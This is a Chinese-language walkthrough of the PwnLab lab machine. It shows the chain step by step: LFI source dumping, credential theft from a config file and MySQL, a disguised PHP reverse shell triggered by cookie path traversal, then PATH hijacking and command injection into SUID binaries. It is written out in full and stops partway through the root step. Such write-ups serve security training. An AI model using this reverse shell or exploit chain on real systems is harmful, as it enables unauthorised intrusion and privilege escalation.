0x00 入侵路徑

網頁網址LFI → 找出含帳密之設定檔 → 登入SQL server找出其他帳密 → 登入網頁上傳偽裝成圖片的reverse shell(需更改cookie) → suid可利用執行檔 → 自創指令 → command injection

0x01 偵查

開場嗅探靶機IP並偵查它開了那些port。

┌──(kali㉿kali)-[~]
└─$ nmap -sP 192.168.18.0/24
Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-09 20:42 EST
Nmap scan report for 192.168.18.1
Host is up (0.0058s latency).
Nmap scan report for 192.168.18.21
Host is up (0.015s latency).
Nmap scan report for 192.168.18.182
Host is up (0.00036s latency).
Nmap scan report for 192.168.18.183
Host is up (0.0015s latency).
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.59 seconds

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sS -sV -T4 -A -p- 192.168.18.183
[sudo] password for kali: 
Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-09 20:50 EST
Nmap scan report for 192.168.18.183
Host is up (0.0011s latency).
Not shown: 65531 closed tcp ports (reset)
PORT      STATE SERVICE VERSION
80/tcp    open  http    Apache httpd 2.4.10 ((Debian))
|_http-title: PwnLab Intranet Image Hosting
|_http-server-header: Apache/2.4.10 (Debian)
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          38831/udp   status
|   100024  1          44287/tcp6  status
|   100024  1          48951/udp6  status
|_  100024  1          49568/tcp   status
3306/tcp  open  mysql   MySQL 5.5.47-0+deb8u1
| mysql-info: 
|   Protocol: 10
|   Version: 5.5.47-0+deb8u1
|   Thread ID: 39
|   Capabilities flags: 63487
|   Some Capabilities: Support41Auth, Speaks41ProtocolOld, Speaks41ProtocolNew, FoundRows, SupportsCompression, LongColumnFlag, SupportsTransactions, InteractiveClient, IgnoreSigpipes, SupportsLoadDataLocal, ConnectWithDatabase, IgnoreSpaceBeforeParenthesis, ODBCClient, DontAllowDatabaseTableColumn, LongPassword, SupportsAuthPlugins, SupportsMultipleResults, SupportsMultipleStatments
|   Status: Autocommit
|   Salt: 9xt]TlCH"l{G0YQi<1~J
|_  Auth Plugin Name: mysql_native_password
49568/tcp open  status  1 (RPC #100024)
MAC Address: 08:00:27:86:36:6E (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   1.14 ms 192.168.18.183

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 39.05 seconds

有80 port,進入網頁如下:

進入login頁面:

看到網址裡有等號--LFI漏洞。 等號後面要接什麼,可以參考

GitHub - SewellDinG/LFIboomCTF: 📖本地文件包含漏洞实践源码及相应协议利用指南

輸入url:

http://192.168.18.183/?page=php://filter/read=convert.base64-encode/resource=login

可以看到網頁輸出結果如下:

亂碼複製如下:

PD9waHANCnNlc3Npb25fc3RhcnQoKTsNCnJlcXVpcmUoImNvbmZpZy5waHAiKTsNCiRteXNxbGkgPSBuZXcgbXlzcWxpKCRzZXJ2ZXIsICR1c2VybmFtZSwgJHBhc3N3b3JkLCAkZGF0YWJhc2UpOw0KDQppZiAoaXNzZXQoJF9QT1NUWyd1c2VyJ10pIGFuZCBpc3NldCgkX1BPU1RbJ3Bhc3MnXSkpDQp7DQoJJGx1c2VyID0gJF9QT1NUWyd1c2VyJ107DQoJJGxwYXNzID0gYmFzZTY0X2VuY29kZSgkX1BPU1RbJ3Bhc3MnXSk7DQoNCgkkc3RtdCA9ICRteXNxbGktPnByZXBhcmUoIlNFTEVDVCAqIEZST00gdXNlcnMgV0hFUkUgdXNlcj0/IEFORCBwYXNzPT8iKTsNCgkkc3RtdC0+YmluZF9wYXJhbSgnc3MnLCAkbHVzZXIsICRscGFzcyk7DQoNCgkkc3RtdC0+ZXhlY3V0ZSgpOw0KCSRzdG10LT5zdG9yZV9SZXN1bHQoKTsNCg0KCWlmICgkc3RtdC0+bnVtX3Jvd3MgPT0gMSkNCgl7DQoJCSRfU0VTU0lPTlsndXNlciddID0gJGx1c2VyOw0KCQloZWFkZXIoJ0xvY2F0aW9uOiA/cGFnZT11cGxvYWQnKTsNCgl9DQoJZWxzZQ0KCXsNCgkJZWNobyAiTG9naW4gZmFpbGVkLiI7DQoJfQ0KfQ0KZWxzZQ0Kew0KCT8+DQoJPGZvcm0gYWN0aW9uPSIiIG1ldGhvZD0iUE9TVCI+DQoJPGxhYmVsPlVzZXJuYW1lOiA8L2xhYmVsPjxpbnB1dCBpZD0idXNlciIgdHlwZT0idGVzdCIgbmFtZT0idXNlciI+PGJyIC8+DQoJPGxhYmVsPlBhc3N3b3JkOiA8L2xhYmVsPjxpbnB1dCBpZD0icGFzcyIgdHlwZT0icGFzc3dvcmQiIG5hbWU9InBhc3MiPjxiciAvPg0KCTxpbnB1dCB0eXBlPSJzdWJtaXQiIG5hbWU9InN1Ym1pdCIgdmFsdWU9IkxvZ2luIj4NCgk8L2Zvcm0+DQoJPD9waHANCn0NCg==

Base64解碼 - 網上的Base64解碼器解碼:

<?php
session_start();
require("config.php");
$mysqli = new mysqli($server, $username, $password, $database);

if (isset($_POST['user']) and isset($_POST['pass']))
{
    $luser = $_POST['user'];
    $lpass = base64_encode($_POST['pass']);

    $stmt = $mysqli->prepare("SELECT * FROM users WHERE user=? AND pass=?");
    $stmt->bind_param('ss', $luser, $lpass);

    $stmt->execute();
    $stmt->store_Result();

    if ($stmt->num_rows == 1)
    {
        $_SESSION['user'] = $luser;
        header('Location: ?page=upload');
    }
    else
    {
        echo "Login failed.";
    }
}
else
{
    ?>
    <form action="" method="POST">
    <label>Username: </label><input id="user" type="test" name="user"><br />
    <label>Password: </label><input id="pass" type="password" name="pass"><br />
    <input type="submit" name="submit" value="Login">
    </form>
    <?php
}
喔

這個php提到了config.php,看能不能用同樣手法得到config的php。

輸入url:

http://192.168.18.183/?page=php://filter/read=convert.base64-encode/resource=config

得到的結果:

PD9waHANCiRzZXJ2ZXIJICA9ICJsb2NhbGhvc3QiOw0KJHVzZXJuYW1lID0gInJvb3QiOw0KJHBhc3N3b3JkID0gIkg0dSVRSl9IOTkiOw0KJGRhdGFiYXNlID0gIlVzZXJzIjsNCj8+

解碼:

<?php
$server      = "localhost";
$username = "root";
$password = "H4u%QJ_H99";
$database = "Users";
?>

喔對了,順便附一下目錄爆破結果:

┌──(kali㉿kali)-[~]
└─$ gobuster dir -u http://192.168.18.183 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,bak,old,zip,gz,con

===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.18.183
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Extensions:              zip,gz,con,php,txt,bak,old
[+] Timeout:                 10s
===============================================================
2022/12/09 21:03:14 Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 293]
/index.php            (Status: 200) [Size: 332]
/images               (Status: 301) [Size: 317] [--> http://192.168.18.183/images/]
/login.php            (Status: 200) [Size: 250]
/upload               (Status: 301) [Size: 317] [--> http://192.168.18.183/upload/]
/upload.php           (Status: 200) [Size: 19]
/config.php           (Status: 200) [Size: 0]
/.php                 (Status: 403) [Size: 293]
/server-status        (Status: 403) [Size: 302]
Progress: 1764040 / 1764488 (99.97%)===============================================================
2022/12/09 21:20:51 Finished
===============================================================

0x02 Get Shell

雖然拿到了帳密,但很可惜的這一台沒開22 port,不能直接get shell,所以試試入侵資料庫。

用剛剛拿到的root帳密登入mysql:

┌──(kali㉿kali)-[~]
└─$ mysql -h 192.168.18.183 -u root -p
Enter password:
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MySQL connection id is 48
Server version: 5.5.47-0+deb8u1 (Debian)

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MySQL [(none)]>

剛剛的config.php有提到是Users資料庫,登入後即可查看其他使用者帳密:

MySQL [(none)]> use mysql;
ERROR 1044 (42000): Access denied for user 'root'@'%' to database 'mysql'
MySQL [(none)]> use Users
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MySQL [Users]> show tables;
+-----------------+
| Tables_in_Users |
+-----------------+
| users           |
+-----------------+
1 row in set (0.001 sec)

MySQL [Users]> select * from users;
+------+------------------+
| user | pass             |
+------+------------------+
| kent | Sld6WHVCSkpOeQ== |
| mike | U0lmZHNURW42SQ== |
| kane | aVN2NVltMkdSbw== |
+------+------------------+
3 rows in set (0.005 sec)

查了一下,這密碼其實也是base64編碼,整理一下:

Sld6WHVCSkpOeQ== → JWzXuBJJNy

U0lmZHNURW42SQ== → SIfdsTEn6I

aVN2NVltMkdSbw== → iSv5Ym2GRo

利用kent的帳密登入:

轉到上傳頁面

但是可以發現無法上傳php,來故技重施,看看upload的原始碼。

輸入url:

http://192.168.18.183/?page=php://filter/read=convert.base64-encode/resource=upload

看到base64亂碼:

亂碼如下:

PD9waHANCnNlc3Npb25fc3RhcnQoKTsNCmlmICghaXNzZXQoJF9TRVNTSU9OWyd1c2VyJ10pKSB7IGRpZSgnWW91IG11c3QgYmUgbG9nIGluLicpOyB9DQo/Pg0KPGh0bWw+DQoJPGJvZHk+DQoJCTxmb3JtIGFjdGlvbj0nJyBtZXRob2Q9J3Bvc3QnIGVuY3R5cGU9J211bHRpcGFydC9mb3JtLWRhdGEnPg0KCQkJPGlucHV0IHR5cGU9J2ZpbGUnIG5hbWU9J2ZpbGUnIGlkPSdmaWxlJyAvPg0KCQkJPGlucHV0IHR5cGU9J3N1Ym1pdCcgbmFtZT0nc3VibWl0JyB2YWx1ZT0nVXBsb2FkJy8+DQoJCTwvZm9ybT4NCgk8L2JvZHk+DQo8L2h0bWw+DQo8P3BocCANCmlmKGlzc2V0KCRfUE9TVFsnc3VibWl0J10pKSB7DQoJaWYgKCRfRklMRVNbJ2ZpbGUnXVsnZXJyb3InXSA8PSAwKSB7DQoJCSRmaWxlbmFtZSAgPSAkX0ZJTEVTWydmaWxlJ11bJ25hbWUnXTsNCgkJJGZpbGV0eXBlICA9ICRfRklMRVNbJ2ZpbGUnXVsndHlwZSddOw0KCQkkdXBsb2FkZGlyID0gJ3VwbG9hZC8nOw0KCQkkZmlsZV9leHQgID0gc3RycmNocigkZmlsZW5hbWUsICcuJyk7DQoJCSRpbWFnZWluZm8gPSBnZXRpbWFnZXNpemUoJF9GSUxFU1snZmlsZSddWyd0bXBfbmFtZSddKTsNCgkJJHdoaXRlbGlzdCA9IGFycmF5KCIuanBnIiwiLmpwZWciLCIuZ2lmIiwiLnBuZyIpOyANCg0KCQlpZiAoIShpbl9hcnJheSgkZmlsZV9leHQsICR3aGl0ZWxpc3QpKSkgew0KCQkJZGllKCdOb3QgYWxsb3dlZCBleHRlbnNpb24sIHBsZWFzZSB1cGxvYWQgaW1hZ2VzIG9ubHkuJyk7DQoJCX0NCg0KCQlpZihzdHJwb3MoJGZpbGV0eXBlLCdpbWFnZScpID09PSBmYWxzZSkgew0KCQkJZGllKCdFcnJvciAwMDEnKTsNCgkJfQ0KDQoJCWlmKCRpbWFnZWluZm9bJ21pbWUnXSAhPSAnaW1hZ2UvZ2lmJyAmJiAkaW1hZ2VpbmZvWydtaW1lJ10gIT0gJ2ltYWdlL2pwZWcnICYmICRpbWFnZWluZm9bJ21pbWUnXSAhPSAnaW1hZ2UvanBnJyYmICRpbWFnZWluZm9bJ21pbWUnXSAhPSAnaW1hZ2UvcG5nJykgew0KCQkJZGllKCdFcnJvciAwMDInKTsNCgkJfQ0KDQoJCWlmKHN1YnN0cl9jb3VudCgkZmlsZXR5cGUsICcvJyk+MSl7DQoJCQlkaWUoJ0Vycm9yIDAwMycpOw0KCQl9DQoNCgkJJHVwbG9hZGZpbGUgPSAkdXBsb2FkZGlyIC4gbWQ1KGJhc2VuYW1lKCRfRklMRVNbJ2ZpbGUnXVsnbmFtZSddKSkuJGZpbGVfZXh0Ow0KDQoJCWlmIChtb3ZlX3VwbG9hZGVkX2ZpbGUoJF9GSUxFU1snZmlsZSddWyd0bXBfbmFtZSddLCAkdXBsb2FkZmlsZSkpIHsNCgkJCWVjaG8gIjxpbWcgc3JjPVwiIi4kdXBsb2FkZmlsZS4iXCI+PGJyIC8+IjsNCgkJfSBlbHNlIHsNCgkJCWRpZSgnRXJyb3IgNCcpOw0KCQl9DQoJfQ0KfQ0KDQo/Pg==

解碼後結果,就是upload.php:

<?php
session_start();
if (!isset($_SESSION['user'])) { die('You must be log in.'); }
?>
<html>
    <body>
        <form action='' method='post' enctype='multipart/form-data'>
            <input type='file' name='file' id='file' />
            <input type='submit' name='submit' value='Upload'/>
        </form>
    </body>
</html>
<?php 
if(isset($_POST['submit'])) {
    if ($_FILES['file']['error'] <= 0) {
        $filename  = $_FILES['file']['name'];
        $filetype  = $_FILES['file']['type'];
        $uploaddir = 'upload/';
        $file_ext  = strrchr($filename, '.');
        $imageinfo = getimagesize($_FILES['file']['tmp_name']);
        $whitelist = array(".jpg",".jpeg",".gif",".png"); 

        if (!(in_array($file_ext, $whitelist))) {
            die('Not allowed extension, please upload images only.');
        }

        if(strpos($filetype,'image') === false) {
            die('Error 001');
        }

        if($imageinfo['mime'] != 'image/gif' && $imageinfo['mime'] != 'image/jpeg' && $imageinfo['mime'] != 'image/jpg'&& $imageinfo['mime'] != 'image/png') {
            die('Error 002');
        }

        if(substr_count($filetype, '/')>1){
            die('Error 003');
        }

        $uploadfile = $uploaddir . md5(basename($_FILES['file']['name'])).$file_ext;

        if (move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)) {
            echo "<img src=\"".$uploadfile."\"><br />";
        } else {
            die('Error 4');
        }
    }
}

?>

重要的是這一行,揭露了可以接受的上傳副檔名:

$whitelist = array(".jpg",".jpeg",".gif",".png");

所以只能上傳以上附檔名,沒關係,一樣用以下php,就是kali中/usr/share/webshells/php路徑的php-reverse-shell.php,但是最前面加個GIF三個字,副檔名不要用php要用gif或png,當然,裡面的IP跟PORT要改成攻擊機的:

GIF
<?php
// php-reverse-shell - A Reverse Shell implementation in PHP
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net
//
// This tool may be used for legal purposes only.  Users take full responsibility
// for any actions performed using this tool.  The author accepts no liability
// for damage caused by this tool.  If these terms are not acceptable to you, then
// do not use this tool.
//
// In all other respects the GPL version 2 applies:
//
// This program is free software; you can redistribute it and/or modify
// it under the terms of the GNU General Public License version 2 as
// published by the Free Software Foundation.
//
// This program is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License along
// with this program; if not, write to the Free Software Foundation, Inc.,
// 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
//
// This tool may be used for legal purposes only.  Users take full responsibility
// for any actions performed using this tool.  If these terms are not acceptable to
// you, then do not use this tool.
//
// You are encouraged to send comments, improvements or suggestions to
// me at pentestmonkey@pentestmonkey.net
//
// Description
// -----------
// This script will make an outbound TCP connection to a hardcoded IP and port.
// The recipient will be given a shell running as the current user (apache normally).
//
// Limitations
// -----------
// proc_open and stream_set_blocking require PHP version 4.3+, or 5+
// Use of stream_select() on file descriptors returned by proc_open() will fail and return FALSE under Windows.
// Some compile-time options are needed for daemonisation (like pcntl, posix).  These are rarely available.
//
// Usage
// -----
// See http://pentestmonkey.net/tools/php-reverse-shell if you get stuck.

set_time_limit (0);
$VERSION = "1.0";
$ip = '192.168.18.182';  // CHANGE THIS
$port = 4444;       // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;

//
// Daemonise ourself if possible to avoid zombies later
//

// pcntl_fork is hardly ever available, but will allow us to daemonise
// our php process and avoid zombies.  Worth a try...
if (function_exists('pcntl_fork')) {
        // Fork and have the parent process exit
        $pid = pcntl_fork();

        if ($pid == -1) {
                printit("ERROR: Can't fork");
                exit(1);
        }

        if ($pid) {
                exit(0);  // Parent exits
        }

        // Make the current process a session leader
        // Will only succeed if we forked
        if (posix_setsid() == -1) {
                printit("Error: Can't setsid()");
                exit(1);
        }

        $daemon = 1;
} else {
        printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");
}

// Change to a safe directory
chdir("/");

// Remove any umask we inherited
umask(0);

//
// Do the reverse shell...
//

// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
        printit("$errstr ($errno)");
        exit(1);
}

// Spawn shell process
$descriptorspec = array(
   0 => array("pipe", "r"),  // stdin is a pipe that the child will read from
   1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
   2 => array("pipe", "w")   // stderr is a pipe that the child will write to
);

$process = proc_open($shell, $descriptorspec, $pipes);

if (!is_resource($process)) {
        printit("ERROR: Can't spawn shell");
        exit(1);
}

// Set everything to non-blocking
// Reason: Occsionally reads will block, even though stream_select tells us they won't
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);

printit("Successfully opened reverse shell to $ip:$port");

while (1) {
        // Check for end of TCP connection
        if (feof($sock)) {
                printit("ERROR: Shell connection terminated");
                break;
        }

        // Check for end of STDOUT
        if (feof($pipes[1])) {
                printit("ERROR: Shell process terminated");
                break;
        }

        // Wait until a command is end down $sock, or some
        // command output is available on STDOUT or STDERR
        $read_a = array($sock, $pipes[1], $pipes[2]);
        $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);

        // If we can read from the TCP socket, send
        // data to process's STDIN
        if (in_array($sock, $read_a)) {
                if ($debug) printit("SOCK READ");
                $input = fread($sock, $chunk_size);
                if ($debug) printit("SOCK: $input");
                fwrite($pipes[0], $input);
        }

        // If we can read from the process's STDOUT
        // send data down tcp connection
        if (in_array($pipes[1], $read_a)) {
                if ($debug) printit("STDOUT READ");
                $input = fread($pipes[1], $chunk_size);
                if ($debug) printit("STDOUT: $input");
                fwrite($sock, $input);
        }

        // If we can read from the process's STDERR
        // send data down tcp connection
        if (in_array($pipes[2], $read_a)) {
                if ($debug) printit("STDERR READ");
                $input = fread($pipes[2], $chunk_size);
                if ($debug) printit("STDERR: $input");
                fwrite($sock, $input);
        }
}

fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);

// Like print, but does nothing if we've daemonised ourself
// (I can't figure out how to redirect STDOUT like a proper daemon)
function printit ($string) {
        if (!$daemon) {
                print "$string\n";
        }
}

?>

雖然上傳了,但到圖片的網址:

依然無法get shell,這時看一下config.php:

http://192.168.18.183/?page=php://filter/convert.base64-encode/resource=index

原始碼:

<?php
//Multilingual. Not implemented yet.
//setcookie("lang","en.lang.php");
if (isset($_COOKIE['lang']))
{
    include("lang/".$_COOKIE['lang']);
}
// Not implemented yet.
?>
<html>
<head>
<title>PwnLab Intranet Image Hosting</title>
</head>
<body>
<center>
<img src="images/pwnlab.png"><br />
[ <a href="/">Home</a> ] [ <a href="?page=login">Login</a> ] [ <a href="?page=upload">Upload</a> ]
<hr/><br/>
<?php
    if (isset($_GET['page']))
    {
        include($_GET['page'].".php");
    }
    else
    {
        echo "Use this server to upload and share image files inside the intranet";
    }
?>
</center>
</body>
</html>

需要edit cookie,要編輯lang那裡,使用curl工具編輯:

┌──(kali㉿kali)-[/usr/share/webshells/php]
└─$ curl -v --cookie "lang=../upload/f7e80460bbcf87fef90b1e428c6a0a56.png" http://192.168.18.183/index.php
*   Trying 192.168.18.183:80...
* Connected to 192.168.18.183 (192.168.18.183) port 80 (#0)
> GET /index.php HTTP/1.1
> Host: 192.168.18.183
> User-Agent: curl/7.84.0
> Accept: */*
> Cookie: lang=../upload/f7e80460bbcf87fef90b1e428c6a0a56.png
>

成功get shell:

┌──(kali㉿kali)-[/usr/share/webshells/php]
└─$ nc -lvp 4444
listening on [any] 4444 ...
192.168.18.183: inverse host lookup failed: Unknown host
connect to [192.168.18.182] from (UNKNOWN) [192.168.18.183] 56028
Linux pwnlab 3.16.0-4-686-pae #1 SMP Debian 3.16.7-ckt20-1+deb8u4 (2016-02-29) i686 GNU/Linux
 10:20:59 up  5:39,  0 users,  load average: 0.00, 0.01, 0.05
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@pwnlab:/$

0x03 提權

用剛剛得到的帳密來逐一切換使用者,每切換一次就用一次linpeas.sh,查看是否有可利用的提權。切到kane時:

www-data@pwnlab:/tmp$ su kane
su kane
Password: iSv5Ym2GRo

kane@pwnlab:/tmp$ ls -al
ls -al
total 1356
drwxrwxrwt  7 root     root       4096 Dec 10 11:39 .
drwxr-xr-x 21 root     root       4096 Mar 17  2016 ..
-rw-r--r--  1 www-data www-data 147181 Dec 10 09:36 351e1d69446ce2d6f2caf508614be3aa.jpeg
-rw-r--r--  1 www-data www-data 423853 Dec 10 09:06 44f84a69b87e45d16477892c391c7aeb.jpg
-rw-r--r--  1 www-data www-data   5500 Dec 10 10:18 f7e80460bbcf87fef90b1e428c6a0a56.png
drwxrwxrwt  2 root     root       4096 Dec 10 04:42 .font-unix
drwxrwxrwt  2 root     root       4096 Dec 10 04:42 .ICE-unix
-rwxrwxrwx  1 www-data www-data 776167 Dec  4 02:49 linpeas.sh
drwxrwxrwt  2 root     root       4096 Dec 10 04:42 .Test-unix
drwxrwxrwt  2 root     root       4096 Dec 10 04:42 .X11-unix
drwxrwxrwt  2 root     root       4096 Dec 10 04:42 .XIM-unix

要執行linpeas時,要先從攻擊機下載下來,詳情可看這一篇: MR-ROBOT: 1 Walkthrough

╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid
strace Not Found
-rwsr-xr-x 1 root root 34K Mar 29  2015 /bin/mount  --->  Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-x 1 root root 38K Nov 19  2015 /bin/su
-rwsr-xr-x 1 root root 26K Mar 29  2015 /bin/umount  --->  BSD/Linux(08-1996)
-rwsr-xr-x 1 root root 95K Aug 13  2014 /sbin/mount.nfs
-rwsr-sr-x 1 mike mike 5.1K Mar 17  2016 /home/kane/msgmike (Unknown SUID binary)
-rwsr-xr-x 1 root root 38K Nov 19  2015 /usr/bin/newgrp  --->  HP-UX_10.20
-rwsr-xr-x 1 root root 52K Nov 19  2015 /usr/bin/chfn  --->  SuSE_9.3/10
-rwsr-sr-x 1 daemon daemon 50K Sep 30  2014 /usr/bin/at  --->  RTru64_UNIX_4.0g(CVE-2002-1614)
-rwsr-xr-x 1 root root 52K Nov 19  2015 /usr/bin/passwd  --->  Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rwsr-sr-x 1 root mail 94K Feb 11  2015 /usr/bin/procmail
-rwsr-xr-x 1 root root 43K Nov 19  2015 /usr/bin/chsh
-rwsr-xr-x 1 root root 77K Nov 19  2015 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 5.3K Feb 24  2014 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 9.4K Feb 11  2016 /usr/lib/pt_chown  --->  GNU_glibc_2.1/2.1.1_-6(08-1999)
-rwsr-xr-- 1 root messagebus 355K Aug  2  2015 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 550K Jan 13  2016 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 1.1M Mar 13  2016 /usr/sbin/exim4

╔══════════╣ SGID
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid
-rwxr-sr-x 1 root shadow 34K Jan  9  2016 /sbin/unix_chkpwd
-rwsr-sr-x 1 mike mike 5.1K Mar 17  2016 /home/kane/msgmike (Unknown SGID binary)
-rwxr-sr-x 1 root ssh 410K Jan 13  2016 /usr/bin/ssh-agent
-rwxr-sr-x 1 root tty 9.5K Oct 17  2014 /usr/bin/bsd-write
-rwxr-sr-x 1 root mail 14K Jun  2  2013 /usr/bin/dotlockfile
-rwsr-sr-x 1 daemon daemon 50K Sep 30  2014 /usr/bin/at  --->  RTru64_UNIX_4.0g(CVE-2002-1614)
-rwxr-sr-x 1 root mail 18K Feb 11  2015 /usr/bin/lockfile
-rwxr-sr-x 1 root crontab 38K Jun  7  2015 /usr/bin/crontab
-rwxr-sr-x 1 root shadow 60K Nov 19  2015 /usr/bin/chage
-rwxr-sr-x 1 root mlocate 32K Jun 13  2013 /usr/bin/mlocate
-rwxr-sr-x 1 root shadow 22K Nov 19  2015 /usr/bin/expiry
-rwsr-sr-x 1 root mail 94K Feb 11  2015 /usr/bin/procmail
-rwxr-sr-x 1 root tty 26K Mar 29  2015 /usr/bin/wall
-rwxr-sr-x 1 root mail 9.6K Dec  4  2014 /usr/bin/mutt_dotlock

可以發現SGID裡特別標出了一個msgmike是Unknown SGID binary,可以來調查一下。

kane@pwnlab:/tmp$ cd /home/kane
cd /home/kane
kane@pwnlab:~$ ls -al
ls -al
total 32
drwxr-x--- 3 kane kane 4096 Dec 10 11:41 .
drwxr-xr-x 6 root root 4096 Mar 17  2016 ..
-rw-r--r-- 1 kane kane  220 Mar 17  2016 .bash_logout
-rw-r--r-- 1 kane kane 3515 Mar 17  2016 .bashrc
drwx------ 2 kane kane 4096 Dec 10 11:41 .gnupg
-rwsr-sr-x 1 mike mike 5148 Mar 17  2016 msgmike
-rw-r--r-- 1 kane kane  675 Mar 17  2016 .profile
kane@pwnlab:~$ file msgmike
file msgmike
msgmike: setuid, setgid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=d7e0b21f33b2134bd17467c3bb9be37deb88b365, not stripped

執行看看:

kane@pwnlab:~$ ./msgmike
./msgmike
cat: /home/mike/msg.txt: No such file or directory

看的出來這其實是在執行cat指令,執行的是

cat /home/mike/msg.txt

接下來的操作很騷,輸入的指令如下:

kane@pwnlab:~$ cd /tmp
cd /tmp
kane@pwnlab:/tmp$ touch cat
touch cat
kane@pwnlab:/tmp$ echo /bin/sh > cat
echo /bin/sh > cat
kane@pwnlab:/tmp$ chmod +x cat
chmod +x cat
kane@pwnlab:/tmp$ export PATH=/tmp:$PATH
export PATH=/tmp:$PATH
kane@pwnlab:/tmp$ cd /home/kane
cd /home/kane
kane@pwnlab:~$ ls -al
ls -al
total 32
drwxr-x--- 3 kane kane 4096 Dec 10 11:41 .
drwxr-xr-x 6 root root 4096 Mar 17  2016 ..
-rw-r--r-- 1 kane kane  220 Mar 17  2016 .bash_logout
-rw-r--r-- 1 kane kane 3515 Mar 17  2016 .bashrc
drwx------ 2 kane kane 4096 Dec 10 11:41 .gnupg
-rwsr-sr-x 1 mike mike 5148 Mar 17  2016 msgmike
-rw-r--r-- 1 kane kane  675 Mar 17  2016 .profile
kane@pwnlab:~$ ./msgmike
./msgmike
$

簡單來說,既然執行的是cat指令,那就乾脆自己新增一個名叫cat的指令,但其實這個指令是/bin/sh,也就是執行的意思。步驟是先創建一個名叫cat的文件: touch cat,接下來用echo把/bin/sh給寫進去,接下來用chmod +x把這文件變成一個可執行的命令,接下來會輸入export PATH=/tmp:$PATH,是因為剛剛所有舉動都是在資料夾/tmp裡做的,如果想不加上路徑就執行這個資料夾裡的執行檔,就得加這一行。

$ python -c 'import pty; pty.spawn("/bin/bash")'
python -c 'import pty; pty.spawn("/bin/bash")'
mike@pwnlab:~$ id
id
uid=1002(mike) gid=1002(mike) groups=1002(mike),1003(kane)

執行msgmike後首先穩定shell,再查查自己是誰。發現自己是mike,乾脆切到mike目錄:

mike@pwnlab:~$ pwd
pwd
/home/kane
mike@pwnlab:~$ cd /home/mike
cd /home/mike
mike@pwnlab:/home/mike$ ls -al
ls -al
total 28
drwxr-x--- 2 mike mike 4096 Mar 17  2016 .
drwxr-xr-x 6 root root 4096 Mar 17  2016 ..
-rw-r--r-- 1 mike mike  220 Mar 17  2016 .bash_logout
-rw-r--r-- 1 mike mike 3515 Mar 17  2016 .bashrc
-rwsr-sr-x 1 root root 5364 Mar 17  2016 msg2root
-rw-r--r-- 1 mike mike  675 Mar 17  2016 .profile

用了ls -al後,發現有一個root權限的msgroot,執行看看:

mike@pwnlab:/home/mike$ ./msg2root
./msg2root
Message for root:

執行看看,發現是可以讓人下指令的執行檔

mike@pwnlab:/home/mike$  ./msg2root
 ./msg2root
Message for root: `id`
`id`
uid=1002(mike) gid=1002(mike) euid=0(root) egid=0(root) groups=0(root),1003(kane)

aaa但輸入config裡調查到的root帳密,卻沒有用:

mike@pwnlab:/home/mike$ ./msg2root
./msg2root
Message for root: `su -`
`su -`
Password: H4u%QJ_H99

su: Authentication failure

不過可以看到root的資料夾有一些有趣的東西:

mike@pwnlab:/home/mike$ ./msg2root
./msg2root
Message for root: `ls /root`
